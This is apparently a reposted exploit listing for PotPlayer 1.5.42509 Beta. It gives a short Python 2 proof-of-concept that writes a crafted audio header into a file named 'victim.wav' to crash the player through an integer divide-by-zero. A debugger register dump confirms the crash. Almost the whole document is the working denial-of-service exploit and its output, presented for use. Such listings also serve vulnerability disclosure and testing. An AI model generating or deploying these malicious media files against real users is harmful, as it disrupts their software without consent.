扫码分享
验证:
体验盒子###########################################################
#[~] Exploit Title:PotPlayer 1.5.42509 Beta - DOS(Integer Division by Zero
#Exploit)
#[~] Author: sajith
#[~] version: PotPlayer 1.5.42509 Beta
#[~]Vendor Homepage: http://daumpotplayer.com/
#[~] Tested in: Windows XP SP3
#[~] vulnerable app link:http://daumpotplayer.com/download/
###########################################################
#POC:
#-------
#!/usr/bin/python
raw_input("Hit Enter to create a malicious file")
f = open("victim.wav","w")
header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
f.write(header)
print "[#] File created by sajith shetty"
raw_input("Hit enter to exit")
#-----
'''
(694.4d8): Integer divide-by-zero - code c0000094 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ffffffff ebx=040e0be0 ecx=00000000 edx=00000000 esi=ffffffff
edi=0021977a
eip=748fe82c esp=0131f2a0 ebp=0131f334 iopl=0 nv up ei pl zr na pe
nc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000
efl=00010246
'''
体验盒子
